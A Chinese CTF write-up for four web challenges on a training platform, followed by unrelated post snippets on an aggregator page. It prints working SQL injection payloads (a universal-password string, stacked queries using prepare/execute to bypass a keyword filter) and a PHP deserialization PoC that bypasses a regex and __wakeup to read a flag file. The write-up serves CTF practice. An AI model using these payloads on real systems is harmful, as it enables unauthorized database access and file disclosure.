当前位置：首页 > news >正文

CTF-web-攻防世界-2

news 2025/8/26 23:13:38

1、newscenter

(1)、访问网站，一个搜索栏，像是SQL注入漏洞，brup抓包尝试一下。

输入2/0、一个单引号、两个单引号、一个双引号、两个双引号等。
发现只有一个单引号时，响应包content-length字段有非常明显的变化为0。说明有可能是字符型，闭合方式为单引号。
尝试这个闭合方式的万能密码，1'+or+'a'='a'--+，发现并没有做太大的过滤

(2)、页面不显示报错信息，不能使用报错注入，其他可用。如联合注入。

(3)、联合注入：字段数、显示位--》数据库--》数据表--》数据(flag)

2、web_php_unserialize

(1)访问网站，是一段代码。代码审计

定义一个类和一个条件执行语句，像unserialize3加了base64编码和正则匹配

(2)POC：在线编码：在线运行PHP (bejson.com)

<?php
class Demo { private $file = 'index.php';public function __construct($file) { $this->file = $file; }
}
$p=new Demo('fl4g.php');
$p=serialize($p); //序列化
$p=str_replace("O:4","O:+4",$p);  //绕过正则匹配
$p=str_replace(":1:{",":2:{",$p); //wakeup绕过
$p=base64_encode($p); //base64编码
echo $p;
?>

(3)、使用get传值，获取flag

3、supersqli

(1)、访问网站，根据提示，是SQL注入漏洞

(2)、字符型注入，看报错信息是闭合方式为单引号，真如描述那样随便注

(3)、尝试获取表时，响应包看到正则匹配，过滤了语句

preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
使用堆叠注入和show语句，如1';use supersqli;show tables;--+
查询表中的列时，需要使用反引号引起来，如1';show columns from `tableN`;--+
查询数据时，就不能使用show，可以使用MySQL预编译绕过。
- 1';prepare a from concat(char(115,101,108,99,116),' * from `tableN`');execute a;--+
- prepare ? from ？：是MySQL中预编译语句，用于准备一个SQL语句
- execute ？：执行预编译的SQL语句

4、web2

(1)、提示，是逆向加密算法，解$miwen。代码审计

miwen：逆序--》每个字符转换成ASCII码后+1--》转回字符--》base64加密--》逆序--》rot13加密

解密：rot13解密--》逆序--》base64解密--》每个字符转换成ASCII码后-1--》转回字符--》逆序

(2)、代码，获取flag

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$miwen=base64_decode(strrev(str_rot13($miwen)));
$mingwen=$miwen;
for($i=0;$i<strlen($mingwen);$i++){$m=substr($mingwen,$i,1);$a=ord($m)-1;$a=chr($a);$c=$c.$a;   }
echo strrev($c);
?>

CTF-web-攻防世界-2

1、newscenter (1)、访问网站，一个搜索栏，像是SQL注入漏洞，brup抓包尝试一下。输入2/0、一个单引号、两个单引号、一个双引号、两个双引号等。发现只有一个单引号时，响应包content-length字段有非常明显的变化为0。说明有可能是…...

编程日记 2024/5/27 13:55:55

文章目录一、数据处理二、环境三、训练数据下载一、数据处理 import traceback import xml.etree.ElementTree as ET import os import shutil import random import cv2 import numpy as np from tqdm import tqdmdef convert_annotation_to_list(xml_filepath, size_width,…...

编程日记 2024/5/27 13:54:54

紧固件松动的危害及原因——SunTorque智能扭矩系统

智能扭矩系统-智能拧紧系统-扭矩自动控制系统-SunTorque 紧固件松动，这一看似微小的机械问题，实际上可能引发一系列严重的后果。在机械设备中，紧固件扮演着至关重要的角色，它们通过紧固作用将各个部件紧密连接在一起，…...

编程日记 2024/5/27 13:53:53

Android-okhttp调接口传参简单举例

步骤1：在主线程中创建thread调接口 new Thread(new Runnable() {Overridepublic void run() {getServiceList();}}).start();步骤2：okhttp调接口 private void getServiceList(){Message msg new Message();try{OkHttpClient okHttpClient new OkHttp…...

编程日记 2024/5/27 13:52:51

复习java5.26

面向对象和面向过程面向过程：把一个任务分成一个个的步骤，当要执行这个任务的时候，只需要依次调用就行了面向对象：把构成任务的事件构成一个个的对象，分别设计这些对象（属性和方法）、然后把…...

编程日记 2024/5/27 13:51:50

学 Python 具体能干什么？

Python 是一种功能强大、用途广泛的编程语言，因其简洁易读的语法和丰富的库生态系统而备受欢迎。学习 Python后，你可以从事以下几方面的工作： 1. Web 开发 Python 有很多流行的 Web 框架，如： Django：一个…...

编程日记 2024/5/27 13:50:49

福昕PDF使用技巧

因为突然间学校的企业版WPS突然很多功能就不能使用了，所以转向福昕PDF。一、合并文件添加需要合并的文件，可以使用ctrla等方式全选找到最上方的“合并文件” 二、文本注释...

编程日记 2024/5/27 13:49:48

条款8：了解各种不同意义的new和delete

有时候我们觉得，C的术语仿佛是要故意让人难以理解似的。这里就有一个例子：请说明new operator 和operator new 之间的差异（译注：本书所说的new operator，即某些C教程如C Primer 所谓的new expression) 当你写出这样…...

编程日记 2024/5/27 13:48:47

windows 搭建 go开发环境

go语言（或 Golang）是Google开发的开源编程语言，诞生于2006年1月2日下午15点4分5秒，于2009年11月开源，2012年发布go稳定版。Go语言在多核并发上拥有原生的设计优势，Go语言从底层原生支持并发，无须…...

编程日记 2024/5/27 13:47:46

Android 布局中@NULL的使用和代码实现方式详解

文章目录 1、使用场景2、示例代码实现2.1、移除背景2.2 、移除文本2.3、移除布局宽度或高度2.4、移除提示文本2.5、移除图像资源 3、综合示例3.1、布局文件 activity_main.xml3.2、主活动文件 MainActivity.java3.4、资源文件3.5、运行结果 4、优点5、缺点6、综合分析6.1、适用…...

编程日记 2024/5/27 13:46:45

服务器数据恢复—同友存储raid5阵列上层虚拟机数据恢复案例

服务器数据恢复环境： 某市教育局同友存储，存储中有一组由数块磁盘组建的raid5阵列，存储空间划分若干lun。每个lun中有若干台虚拟机，其中有数台linux操作系统的虚拟机为重要数据。存储结构： 服务器故障： r…...

编程日记 2024/5/27 13:45:44

我得近况说明

最近转入了Django开发工作，所以主要方向在Python开发。...

编程日记 2024/5/27 13:44:43

C语言——在头⽂件中#if、_STDC_等字⾏起什么作⽤？

一、问题通常，⼀些程序员都不会去研究头⽂件中的内容是什么含义，总觉得乱乱的，有很多 #if、_STDC_、#line 等字符，那么这些字符都各代表什么呢，在头⽂件中又起到什么作⽤呢？ 二、解答在头⽂件中存在类似…...

编程日记 2024/5/27 13:42:39

解密MySQL中的临时表：探究临时表的神奇用途

欢迎来到我的博客，代码的世界里，每一行都是一个故事解密MySQL中的临时表：探究临时表的神奇用途前言临时表的定义与分类创建与使用临时表临时表的操作与管理优化与性能提升注意事项与最佳实践前言在数据库管理中，临时表是一个…...

编程日记 2024/5/27 13:41:38

Go 语言简介 -- 高效、简洁与现代化编程的完美结合

在现代软件开发领域，选择合适的编程语言对于项目的成功至关重要。Go 语言（又称 Golang ）自 2009 年由Google发布以来，以其简洁的语法、高效的并发模型以及强大的性能，迅速成为开发者们的新宠。Go语言不仅融合了传统编译…...

编程日记 2024/5/27 13:40:37

绝缘鞋计量校准周期多长时间合适？校验检测方法是什么？

绝缘鞋的计量校准，通常是应用在电学相关领域，因此也是属于计量校准机构中的电学室管辖的范围，而绝缘鞋为了安全防护，也是采用了绝缘材料，其标准要求耐电压至少在15KV以下，可应用于工频（50到60F&…...

编程日记 2024/5/27 13:39:36

python-13（案例讲解）

目录抓取链家前十页的数据计算均价和总价计算的类型（整租，合租） 计算的房型抓取boss直聘前十页的数据抓取boss直聘前十页的数据将获取数据本地序列化计算每个区的需求个数与均价抓取链家前十页的数据链家网址：长…...

编程日记 2024/5/27 13:37:33

【深度学习】最强算法之：人工神经网络(ANN)

人工神经网络ANN 1、引言2、人工神经网络(ANN)2.1 定义2.1.1 定义2.1.2 应用场景 2.2 核心原理2.3 实现方式2.4 算法公式2.5 代码示例 3、总结 1、引言小屌丝：鱼哥，看新闻没？ 小鱼：新闻天天看，啥事大惊小怪的。小屌…...

编程日记 2024/5/27 13:36:32

Unity vscode在mac上的编译环境设置

在settings.json文件中配置以下信息。 settings.json路径一般在/Users/xxx/Library/Application Support/Code/User/settings.json {"omnisharp.useGlobalMono": "always","editor.fontLigatures": false,"omnisharp.useModernNet": …...

编程日记 2024/5/27 13:34:30

【Java】在高并发场景下，保证 Redis 缓存一致性的几种方案

在高并发场景下，保证 Redis 缓存一致性是一个常见的挑战。以下是几种常见的解决方案及其优缺点，以及相应的代码示例。 1. Cache Aside Pattern (旁路缓存模式) 原理读取数据时，先读缓存，如果缓存没有命中，再从数据…...

编程日记 2024/5/27 13:33:28

挑战杯推荐项目

“人工智能”创意赛 - 智能艺术创作助手：借助大模型技术，开发能根据用户输入的主题、风格等要求，生成绘画、音乐、文学作品等多种形式艺术创作灵感或初稿的应用，帮助艺术家和创意爱好者激发创意、提高创作效率。 - 个性化梦境…...

编程新知 2025/6/17 7:15:49

leetcodeSQL解题：3564. 季节性销售分析

leetcodeSQL解题：3564. 季节性销售分析题目： 表：sales ---------------------- | Column Name | Type | ---------------------- | sale_id | int | | product_id | int | | sale_date | date | | quantity | int | | price | decimal | -…...

编程新知 2025/8/20 17:01:25